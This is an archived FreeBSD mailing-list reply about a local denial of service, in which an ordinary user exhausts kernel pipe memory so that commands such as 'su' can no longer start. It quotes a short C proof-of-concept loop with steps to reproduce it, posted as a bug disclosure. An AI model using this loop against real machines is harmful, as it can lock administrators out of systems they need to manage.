Date: Mon, 7 Apr 2014 13:42:35 +0200 From: Eduardo Morras <emorrasg@yahoo.es> To: freebsd-hackers@freebsd.org Subject: Re: pipe() resource exhaustion Message-ID: <20140407134235.eed2e9555c76f5834d991bfa@yahoo.es> In-Reply-To: <lhu0jv$r6n$1@ger.gmane.org> References: <lhu0jv$r6n$1@ger.gmane.org>
next in thread | previous in thread | raw e-mail | index | archive | help
On Mon, 07 Apr 2014 13:02:22 +0200
Ivan Voras <ivoras@freebsd.org> wrote:
> Hello,
>
> Last time I mentioned this it didn't get any attention, so I'll try
> again. By accident (via a buggy synergy server process) I found that a
> simple userland process can exhaust kernel pipe memory
> (kern.ipc.pipekva sysctl) which as a consequence has that new
> processes which use pipe cannot be started, which includes "su", by
> which an administrator could kill such a process.
>
> The description is simple enough, I don't think a proof of concept is
> really needed, but here it is:
>
> step 1:
> run this as a normal, non-root user:
>
> #include <stdlib.h>
> #include <stdio.h>
> #include <unistd.h>
> #include <errno.h>
> #include <err.h>
> #include <string.h>
>
> int main() {
> int fd[2];
> int is_error = 0;
>
> while (1) {
> if (pipe(fd) != 0) {
> if (!is_error) {
> printf("%s\n", strerror(errno));
> is_error = 1;
> }
> }
> }
> }
>
> step 2:
> try and fail to run "su" in another terminal:
>
> $ su
> Password:
> su: pipe: Cannot allocate memory
>
> I'm sure this has other implications as well :)
>
Each time you call pipe(fd) inside the while, you create a new pipe. Perhaps you wanted to say:
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <err.h>
#include <string.h>
int main() {
int fd[2];
int is_error = 0;
if (pipe(fd) != 0) {
if (!is_error) {
printf("%s\n", strerror(errno));
is_error = 1;
}
}
while (1) {
/* Do whatever you want with pipe fd */
}
close(fd);
}
Synergy server process, as you said, is buggy if it does things as your example program.
> The problem isn't present on all systems: on some it looks like the
> limit on fd's is reached faster than the limit on pipekva. Of 5
> machines I tested, 3 running 9.x and 2 running 10.x, both machines
> running 10.x exhaust pipekva before fd's, while only one machine
> running 9.x did that. Neither machine had increased fd limits above
> the autotuned defaults.
>
> Anecdotally, a machine which was running 9.x didn't experience this
> problem with synergys, but it did when upgraded to 10.x with no change
> to sysctl configuration.
Often short-live buggy process don't show any problems because they exit before they happen.
--- ---
Eduardo Morras <emorrasg@yahoo.es>
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20140407134235.eed2e9555c76f5834d991bfa>